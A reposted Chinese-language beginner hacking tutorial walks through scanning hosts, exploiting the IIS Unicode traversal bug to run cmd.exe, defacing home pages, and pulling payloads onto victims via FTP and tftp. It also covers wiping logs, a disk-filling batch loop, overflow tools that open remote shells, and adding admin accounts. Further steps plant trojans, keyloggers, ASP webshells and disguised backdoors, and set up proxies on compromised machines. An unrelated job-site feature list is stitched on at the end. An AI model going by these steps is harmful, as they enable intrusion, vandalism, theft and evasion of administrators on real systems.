网络黑人及防黑的基础知识(转)

同志们,大家一定要记住,牧野的这篇贴只是想让大家对于网络知识有个了解,不要看了这篇连载后到处显示自己的'所谓的本领”啊,因为这些技术在懂行人的眼中可是好菜的啊,主要是用来骗MM的,:)
  俗话说:'工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。

  1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。

  2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。

  3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!)

  4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)

  5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!

  6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!

  7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!

  8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉 (比较理想化)

  9,流光4for 2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,操作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!

  10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。
我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。

  首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)

  第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后,我们应该知道它的ip,很简单,ping它一下就可以了。

  ping www.flyingfish.com,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了 第二,该主机装了防火墙,禁止ping,不过这种可能很小。

  知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值

21--ftp 重要哦

23--telnet 欢呼吧

25-smtp 尽管重要,但似乎没什么可利用的

53--domain 同上

79--finger 可知道用户信息了

80--http 要看网页,没它不行吧

110--pop 收信的

139--netbios 共享用的,很有利用价值哦

3389--win2000超级终端 呵呵,这个好!

  其实端口有上千种,这些最最常用

  我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)

  那么我们该如何应对呢?

  ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)

  若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望

  telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级白痴:)随便猜个,错了,闪人!

  smtp,看着它,无奈

  domain,一般它带了局域网了

  finger 可以知道用户列表了,不好,忘了用法了,幸好finger很少出现

  80肯定在,我们等会来对付它

  110 有smtp,pop在也不奇怪了

  139 找个扫描器来找找有没有露在外面的共享吧,日后也用得着

  3389 太太太好了!!打开客户端吧,用输入法漏洞试试,成了就干了它!不成也没事,我们以后完全控制它3389会很方便的。

  端口扫完了!我们在多了解它一点吧!追捕大家都知道吧,其实用它获取主机信息也不赖哦。打开追捕,输入ip,选择智能追捕,是不是有很多信息出来了?虽然不能直接利用,但毕竟我们有对它有了进一步的了解。

  掌握了那么多信息,我们该做点什么了,一般黑客入侵都是靠着系统漏洞,不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。

  对漏洞大家可能不太了解,我这里也不能一一说明了,太多了,感兴趣的话去论坛找freedom吧!

  目前广泛利用和存在的漏洞有:unicode,unicode后续,iis溢出,.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定,呵呵,绝对不会是一行一行地在ie中试吧,拿出x-scan吧,很好的扫描器哦!

  稍微设置一下就上路吧!过了一会,呵呵,报告出来了,快看,哇!漏洞一大堆!这下赚了!各条漏洞都有详细的信息,大家看吧,总比我说的准了。

  现在这台主机已经和我们成为亲戚了,要让这位亲爱的亲戚做点事,就要开始各种攻击了,下回我们就探讨一下最最可爱的unicode漏洞,各位可能就会在unicode中完成第一次黑客体验。下篇再见。
如果看懂后,对于你的网络安全知识可是大有提高的,牧野可以保证。

  今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。

  2000年10月17日中联绿盟发布了以下的安全公告:

  微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

  远程漏洞:是

  本地漏洞:是

  发布日期:2000年10月17日

  更新日期:2000年10月17日

  受影响的版本:

  Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

  这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。

  下面开始正式学习:

  一,UNICODE漏洞的原理

  此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 台湾繁体中文也同样存在这样的漏洞。

  中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中

  %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘

  %c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘‘

  在NT4中/编码为%c1%9c

  在英文版里: WIN2000英文版%c0%af

  在中文win2k里:%c1%1c

  此外还有多种编码,不一一阐述。

  本文例子均以win2k为准,其他类型请自行替换。

  二,一切从基础开始

  由于winntsystem32cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)

  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

  学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。

  如果成功,那么在浏览区可看到如下信息:

  Directory of C:inetpubscripts

  2000-09-28 15:49 〈DIR〉 .

  2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)

  是不是有自己机器的感觉了,正点!就是这种感觉!

  cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!

  url.gifhttp://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir (这个命令同样道理)

  大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:

  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe

  会dos的朋友一定懂其意义了,不懂的请去看书 .

  不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

[page]
  三,实战演练

  1,修改主页!(是不是很爽?)

  一般主页位置在c:inetpubwwwroot下,但要是改了路径,就需要找找了。

  最方便的方法:在浏览器里输入 url.gifhttp://11.11.22.22/.ida要是有漏洞,那在浏览器里便会显示主页路径,这个漏洞存在率很高,自然是我们的首选。

  分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。

  dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。

  找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm

  那么我们就修改它吧!

  最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu > c:autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice > > c:autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。

  11.11.22.22/scripts/..%c1%1c../winnt/system3

2/cmd.exe?/c+echo+

hackedbycshu+> c:inetpubwwwrootindex.htm

  回应为:HTTP 500 - 内部服务器错误

  通过对cmd的分析,袁哥得出一条简便的方法,加入'符号

  11.11.22.22/scripts/..%c1%1c../wi

nnt/system32/cmd'.exe?/c+ec

ho+hackedbycshu+> c:inetpubwwwrootindex.htm

  11.11.22.22/scripts/..%c1%1c../w

innt/system32/cmd'.exe?/c+echo+

2001730+> > c:inetpubwwwrootindex.htm

  回应为:cgi错误,不用理会

  两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧

  而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo

  例如:11.11.22.22/scripts/..%c1%1c../winnt/system32

/cmd.exe?/c+copy+cmd.exe+c:a.exe

  11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+

hackedbycshu+> c:inetpubwwwrootindex.htm

  2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页上传,这个我们后面介绍。

  几点忠告:

  1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德

  2,echo前记得帮他们做好备份

  3,不准在主页里加入恶性语句

  2,下载文件

  要是有什么有用的文件被你发现,那我们如何下载呢?

  最简单的方法:把文件copy至网页目录下。copy c:emailaby.eml c:inetpubwwwrootaby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。

  别的方法:对不起,没想好:)


  3,最重要的上传

  一般方法:ftp法

  首先建一个ftp脚本文件:c:hehe.haha(名字乱?眩??昵胍桓鰂tp账号,然后用echo吧

echo+open ftp.cshu.com(ftp主机) > c:hehe.haha

echo+user yourname > > cc:hehe.haha (yourname是用户名)

echo+yourpasswd > > c:hehe.haha (yourpasswd是密码)

echo+get setup.exe > > c:hehe.haha 要下载的文件

echo+quit > > c:hehe.haha

  完了以后:ftp+/s:c:hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)

  别忘了先上传到ftp主机,不要做马大哈哦!

  最简单的方法:tftp法。

  这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)

  在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)

   安装好后运行,别忘了设置好默认目录,否则会找不到文件

  tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:winntihateu.exe(ihateu.exe在默认目录里)

  1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!

  学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)

  4,如何清除痕迹

  虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!

C:winntsystem32logfiles*.*

C:winntssytem32config*.evt

C:winntsystem32dtclog*.*

C:winntsystem32*.log

C:winntsystem32*.txt

C:winnt*.txt

C:winnt*.log

全……擦掉!


  四,细节问题。

  1,遇到长文件名怎么办?

  c:program files

  就用c:'program20%files'

  2,遇到空格怎么办?

  20%代替喽,或者xx yy=xxyy~1

  3,如何做个很大的文件?

  目的就是破坏啦!我不喜欢不过教教你们啦

@echo off

echo big > c:a.a

:h

copy c:a.a+c:a.a c:a.a

goto h

注意不要乱来啊!

  4,输入命令,没反应或反应不对。

  :)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!

url.gifhttp://www.exsample.com/scripts/..À; ¯ ..À ¯ ..À ¯ ..À ¯

../winnt/system32/cmd.exe?/c+dir+c :

url.gifhttp://www.exsample.com/msadc/..%c0%af..%c0%af..

%c0%af../winnt/system32/cmd.exe?/c+dir+c:

url.gifhttp://www.exsample.com/_vti_bin/..%c0%af..%c0%a

f..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

url.gifhttp://www.exsample.com/_mem_bin/..%c0%af..

%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

  不一定有用哦! [page]

  5,如何找到unicode漏洞的主机

  呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)

  不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!

  6,我copy,del文件,怎么显示aceess denined?

  这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!

  这个我会在今后介绍,现在你可以试试attrib

  attrib -r -h -s c:autoexec.bat

  再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!

  7,我黑了主页,天下无敌?

  我本来想对你说:'见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口

  echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!

  对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!

  要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择

  8,我如何做更多的事?

  第一,努力提高权限

  第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!



  一,frontpage扩展攻击。

  为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管白痴的疏忽(为什么白痴满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢白痴网管和微软啊!

  具体做法:

  1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。

  2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。

  3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!^_^)文件菜单下选择'打开站点”,然后在文件夹框里写入url.gifhttp://11.11.22.22(我习惯用这个做例子,以fp2000为准)注意http://不要漏掉。在按下'打开”按钮前,不要忘了祈祷:)一两秒后,出现了文件夹,好啊!成功了,现在就可以操作网页文件了。

  4,万一跳出错误信息,表示有密码(这个不算白痴)这时我们试着用以下url,url.gifhttp://11.11.22.22/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,应该是unix的加密,找个解密器破密码吧!运气好的话还可以改网页。

  我的看法:

  这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。

  二,iis.printer溢出攻击

  据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!

  具体原理我也不是很清楚,只能说个大概:当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的'非法操作”其实也是可能是由于溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了,因此……溢出攻击是非常强大的!

  由于汇编对于我们来说较难掌握,加之对溢出的了解很有限,那么我们只能借助高手们的程序来黑了。

  具体方法:

  1,准备iishack,本站有下载,该版本可以对多种系统进行攻击。

  2,用x-scan或流光扫描一个有iis.printer漏洞的主机,然后就可以攻击了。

  3,在命令行方式执行iis5hack (主机ip) (端口号,默认80)(系统代号,具体可参考程序的说明) ( shell口)

  例如:iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)

  4,用nc或telnet连上,nc/telnet 11.11.22.22 111,成功的话就可以控制机器了,加个用户,做个代理……

  我的看法:

  这算是一个比较有用的漏洞了,它能帮助我们取得system权限,其实和admin差不了多少了,对于做一台跳板是非常有利的,希望大家熟练掌握。

  三,idq/ida漏洞溢出攻击

  这是时下很热门的了,原理和上面的printer相似,目前我只找到了iis5的攻击程序,在cshu里也可以找到的,我们准备的是snake的gui版本,很方便的。

  具体方法:

  1,准备snakeiis溢出程序。可以从本站下载。

  2,ida/idq漏洞很多的,但win2k的服务器就不是那么普遍了,所以用你熟练的扫描器去找一打win2k的机器吧。

  3,程序的界面是很傻瓜的,把ip填入,选择好类型,按下溢出按钮,显示shellcode发送完毕。

  4,telnet/nc到你设定好的端口,如果成功的话,会显示目录下的信息(因为默认shellcode是dir)

  5,欢呼吧!再次溢出,别忘了改shellcode为你想要的代码哦。

  6,重复4,很快一台新鲜的win2k被你控制了!

  我的看法:

  我很喜欢用这种攻击,因为win2k的3389可以很方便的为我做事,省力地搞到一台win2k,然后慢慢享用,爽到根尖细胞啊!大家应该掌握这项方法。

  四,*bsd telnetd溢出攻击

  又是溢出,不过这个可是真正的热点哦,最近红盟等大型安全网站被黑就是因为这个!所以看看吧

  具体方法:

  1,使用fbsdhack for win2k来攻击,本站有下载的

  2,还是要找到这样的主机,一般是xnix的,比较少的,用专门的扫描器吧,我会在不久放出来。

  3,等吧!这个漏洞要发送的信息很大,大约16mb,可怕吧,所以最好用高速肉鸡

  4,有幸成功了,记得请我吃饭!

  我的看法:

  这个漏洞的利用比较有难度,从找机器开始就是。但作为黑客爱好者,我们没有理由去回避它!

  五,密码暴力破解

  这是最最原始,也是最最基本的攻击的方式了,利用字典文件或暴力模式,对密码进行探测。费时费力,但若有经验的话,可以缩短这一过程。

  具体方法:

  1,找一个破解器,有ftp,http,smtp,pop3,telnet等等类型。

  2,找到一台相应的主机。

  3,设定一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去泡妞……就是不要傻等。为什么呢?因为会伤视力的:)怎么倒了一片,起来起来!

  4,万一成功了(之所以用这个词,是因为成功率很低的)表明你运气旺,赶紧下线,买彩票去吧^_^


  大家好,这几天被cgi程序搞得头昏脑胀,主要还是51的错,什么破东西,那么多错误!现在只好暂时借人家的地方用。

  这是菜鸟操的最后第二节,说实话我还可以写很多的,但是作业还欠了一大堆:(为什么我没有满舟的狗屎运?算了算了,我不合那种欺世盗名之辈一般见识,开始做操吧!

  不知道大家对unicode和溢出攻击是不是熟练了?没有的要加油哦!今天我们来谈谈权限的提升。

  在windows系统中,最高的权限掌握在administrators的手里,在xnix中称为root,我们要完全掌握一台机器,拿到admin是不可或缺的。

  首先说说最简单的:system to admin

  当我们用溢出攻击成功后,其实我们已经拿到了system权限(具体看每种攻击而可能有所不同)这时我们很容易拿到admin权限。首先看看一下命令:

  net user 察看用户表 net user username pass /add(添加密码为pass的用户username)

  net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组

  net use ipipc$ 'password' /user:username 这是远程连接的命令 [page]

  假如我们溢出了11.11.22.22,那么这样做吧!

  net user (看到了iusr_machinename的用户了,它一般没什么权限的)

  net user iusr_machinename cshu (把它的密码设为cshu)

  net localgroup administrators iusr_machinename /add(加入administrators组)

  这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧!

  熟悉一下net use 命令:

  net use .11.22.22ipc$ 'cshu' /user:iusr_machinename 建立连接

  copy c:haha.exe .11.22.22admin$ 把haha.exe 复制到机器c:winntsystem32上,若是c$.d$,就表示c,d盘

  net time .11.22.22 看到了时间了,比如是8点

  at .11.22.22 8:03 haha.exe 就会在8点3分执行。

  net use .11.22.22 /delete 断开连接

  应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了,admin是最高权限,所以没有限制的:)

  是不是很简单?所以我是溢出是很厉害的攻击方法。

  3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章)

  总的来说,还是unicode的机器最多,为什么白痴网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。

  首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy 或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。

  1,如果我们可以对winntepair和winntconfig进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp 把get改成put下载下来,或者把它复制到inetpubwwwroot下,改成zip下载。

  拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。

  2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!

  3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)

  4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!

  5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:document. and settings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.

  6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。

  总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际操作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)

  想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。

  那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧!

  这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟操的同时,我们的cshu(cshu.51.net)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们。

  今天说点什么呢?没有主题,乱谈一通吧!

  首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。

  我来说说我自己觉得最有用的几个项目:

  1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。

  remote execute-x 这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我)

  remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的!

  remote ftp sam -x 拿sam的,还是用最好的lc3来解吧!

  frontpage extended 这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilege hole的话,放声大笑吧!(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点,url.gifhttp://ip就可以了!(http://不要忘)

  此外还有一点变通,大家肯定读的懂的。

  2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。

  3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧!

  总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟操的资料吧!另外给大家推荐一个站点:www.hack.co.za,有什么漏洞的话就去那里找找,你会有所收获的

  然后我想说说一些黑站的经验。

  ☆当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。

  上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧!

  推荐他的最大原因便是----便于隐藏!一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:)

  最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧)

  ☆我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poison box,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧!

  我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?

  ☆要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令:

  net start termservice 启动win2k的终端控制

  net start workstation 打开net use 功能

  net start lanmanserver 打开ipc

  net start eventlog 启动日志(你不会那么傻吧!stop)

  net start schedule 打开计划(at)

  net start server 共享

  还有很多,net命令里去找吧!

  ☆打开telnet

  1,远程去运行ntlm.exe,流光里有

  2,net stop telnet

  3, net start telnet

  ☆我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的!

  至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了!

  ☆代理问题。我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。

  具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。

  做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦!

  要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:dzc??国内最最好的的代理站点,怕死的朋友千万不要错过。

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10294527/viewspace-125083/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10294527/viewspace-125083/

1、个人在线添加求职简历 2、个在线上传个人相片 3、首页显示最新新闻信息10条(可修改) 4、首页显示最新招聘信息10条(可修改) 5、首页显示最新求职信息10条(可修改) 6、注册用户可在线发送求职/招聘意向邮件 7、企业可发布多条招聘信息 8、企业自己删除招聘信息 9、个人/企业帐号注销 10、首页页尾导航采用数据库形式方便随时更改 11、首页所有广告及链接图片均为数据库形式更新更轻松 12、站内基本信息统计 13、在线人才新闻系统 14、在线政策法规发布系统 15、在线人事代理信息发布系统 16、企业营业执照图片在线上传 17、企业信息和招聘信息独立分开,更便于查看 18、院校用户注册功能(暂不提供) 19、培训机构注册(暂不提供) 20、猎头服务(暂不提供) 21、站内信件群发 22、新闻添加删除 23、政策法规信息添加删除 24、人事代理信息添加删除 25、系统后台管理可直接设置前台广告图片链接版权等信息 26、在线调查系统(以功能在vote.asp 和 votechk.asp页面上,本站没有使用 27、后台清空调查数据 28、招聘信息管理 29、后台管理分三级设置 30、系统管理员拥有所有权限 31、二级管理员可对所有用户及新闻、政策、人事等信息有管理权限 32、三级管理员只拥有新闻、政策、人事等信息的发布删除权 33、站内信件群发 34、首页广告图片后台直接设置,方便更换 35、首页链接及页面标题后台直接设置 36、后台添加管理员,删除管理员 37、后台修改管理员权限 38、站内信息搜索(本程序未程序,在search.asp 和 searchs.asp 页面上。)
